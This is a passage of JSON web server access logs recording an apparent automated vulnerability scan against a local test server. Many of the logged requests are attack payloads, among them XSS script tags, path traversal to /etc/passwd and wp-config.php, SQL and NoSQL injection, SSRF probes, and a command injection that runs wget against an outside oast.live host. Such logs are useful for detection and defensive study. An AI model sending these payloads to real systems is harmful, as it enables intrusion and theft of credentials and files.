+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /virtualems/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://ca28fg0smpvbd3qg07h0p3khxaqn84e9k.oast.live%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"command=create%20cli%20alias%20private%20list%20command%20bash","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_dump.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/user_add.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"j_username=system&j_password=password&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/59 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x0D\x0A \x22auth\x22: {\x0D\x0A \x22user\x22: {\x0D\x0A \x22$eq\x22: \x22admin\x22\x0D\x0A },\x0D\x0A \x22password\x22: [\x0D\x0A 0\x0D\x0A ]\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ContactAdministrators!default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /VirtualEms/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipython/tree HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forums/search/z--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /old_phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"command=list%20%2Ftmp%2Fnonexistent","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://ca28fg0smpvbd3qg07h0baj5foyfz3qyw.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/61 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://ca28fg0smpvbd3qg07h07em4p6m8gfrc4.oast.live)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infos.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", 